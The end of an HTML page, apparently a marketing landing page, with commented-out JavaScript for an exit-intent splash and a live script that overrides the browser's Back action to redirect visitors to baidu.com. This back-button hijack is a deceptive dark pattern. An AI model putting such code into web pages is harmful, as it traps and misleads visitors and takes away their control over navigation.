//	    PreventExitSplash = true;
//	    if(typeof et_timer !== 'undefined') clearTimeout(et_timer);
//	    //document.getElementById("et_status").innerHTML = 'preventExitTrafic disabled for ' + timer_value + ' msec';
//	    et_timer = setTimeout("EnableExitTraffic();", timer_value);
//	    //PreventExitSplash = true;
//	     //console.log('click '  + PreventExitSplash);
//	}
//
//	// this one shuld be in etraffic.js ??
//	function EnableExitTraffic(){
//	    PreventExitSplash = false;
//	    //document.getElementById("et_status").innerHTML = 'preventExitTrafic ENABLE AGAIN';
//	    clearTimeout(et_timer);
//	    //console.log('click '  + PreventExitSplash);
//	}
//
//	addLoadEvent(disableformsfunc);
//	// ENABLE BEFORE LAUNCH
//
//	window.onbeforeunload = DisplayExitSplash;
//	//-->
	</script>
	<script type="text/javascript" src="backfix.min.js"></script>
	<script type="text/javascript">bajb_backdetect.OnBack = function(){
		window.history.back=function(){
			document.location= 'http://www.baidu.com'
		}
	}
	</script>
<style type="text/css">div, main, article, aside, footer, nav, section, header {display: block;}span {display: inline;}h1, h2, h3 {display: block;}
</style>


</body></html>